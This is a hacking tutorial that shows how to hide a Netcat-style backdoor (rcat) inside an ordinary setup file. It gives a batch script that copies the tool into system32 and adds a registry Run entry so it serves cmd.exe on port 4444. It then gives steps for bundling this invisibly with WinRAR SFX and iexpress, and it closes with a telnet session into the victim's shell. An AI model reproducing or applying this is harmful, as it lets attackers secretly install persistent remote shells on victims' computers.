As rcat is a good replica of Netcat and has an ability to bypass
most of the antivirus, then why not wrap it up with another file
(that must not a backdoor)?
To do this we use a simple technique:
- Create a batch file that will add your Netcat into the system
folder and can edit the registry of the windows. Wait you don’t
need to create it because I did it for you.
copy rcat.exe %systemroot%system32rcat.exe
if errorlevel 0 goto regedit
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d “%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe”
if errorlevel 0 goto ip
echo something wrong with the program.
echo write down the IP address from the table
nc -L -p 4444 -t
- Open a notepad and than save it to name.bat
- Download rcat and then copy rcat.exe into the same directory where name.bat exist
- Now we use winrar to combine these two file, select both and then right click on add to archive
- On the next window mark check on create SFX archive
- Go to advance tab and click on SFX option
- Fill out the options like at the figure below
- Change the tab to modes and place mark of hide all
- Almost done click OK than OK to create a file
- New file must be appear at the same directory
- We have combined it but now make it more compitable
- Click on the start than run and type iexpress
- iexpress wizard will start, click on next, then next (leave it as default), and then where it ask about package title write any title like test
- On the next two window click leave as a default and then you need to add your files.
need to add two files like I did (see figure below) one must a .exe
file that we have made by using above method and the second file will be
any setup file. iexpress combines them to make one.
- On the next window there will be two options, on the install program select the simple setup and on the post install command select the backdoor.
- On the next window place mark on hidden then click next
- Enter the name of the final file and place mark on first option (see figure below )
- On next window no restart and
then don’t save, on the last create the package.
- Your new file must be appear on the same directory and here is the report.
- New file has an ability to bypass the most famous antivirus software and it has contained our back door.
[email protected]:~# telnet 192.168.1.8 4444
Connected to 192.168.1.8.
Escape character is ‘^]’.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsBlacksheep>